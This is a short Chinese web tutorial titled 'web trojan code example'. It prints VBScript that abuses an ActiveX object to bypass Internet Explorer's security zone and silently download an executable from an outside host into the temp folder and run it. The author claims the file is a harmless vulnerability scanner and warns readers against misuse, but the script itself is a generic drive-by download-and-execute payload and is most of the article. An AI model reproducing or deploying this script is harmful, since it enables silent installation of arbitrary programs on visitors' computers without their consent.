对于经常上网冲浪的朋友对于网页木马一定不会陌生，打开某个网站，莫名其妙的运行了某个木马，虽然在"Internet选项"里有"安全"设置，但是下面的代码就不会弹出任何信息就直接运行了程序，不信，follow me! (提示: 只是了解一下技术和方法，千万别搞破坏，yexj00.exe是一个windows2000 漏洞扫描器和查漏补缺用的，不是病毒或木马，放心运行。) 复制代码 代码如下:<script language="VBScript"> on error resume next dl = "<a href="http://yexj00.5dm.cn/soft/yexj00.exe" target="_blank">http://yexj00.5dm.cn/soft/yexj00.exe</a>" set ye=document.createElement("object") yStr="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" ye.setAttribute "classid",yStr Set x = ye.CreateObject("Microsoft.XMLHTTP","") set S = ye.createobject("ADODB.Stream","") S.type = 1 x.Open "GET", dl, False x.Send fname="win2000漏洞扫描器.exe" set F = ye.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) fname= F.BuildPath(tmp,fname) S.open S.write x.responseBody S.savetofile fname,2 S.close set A=ye.createobject("Shell.Application","") A.ShellExecute fname,"","", "open",1 </script>

　　推荐阅读

　　ASP抽取数据的执行效率

通常从数据库中抽取数据记录，需要使用到SQL语句，查询获得相关记录集，然后从记录集中选择相关字段、相关记录行进行显示。 那么在抽取到显示的一系列列过程中，如果注意如下几个要点，则令抽取数据的执行效率大大>>>详细阅读

本文标题：网页木马代码例子（里面的文件是漏洞扫描器，呵呵）

地址：http://www.17bianji.com/kaifa2/ASP/32907.html

 1/2    1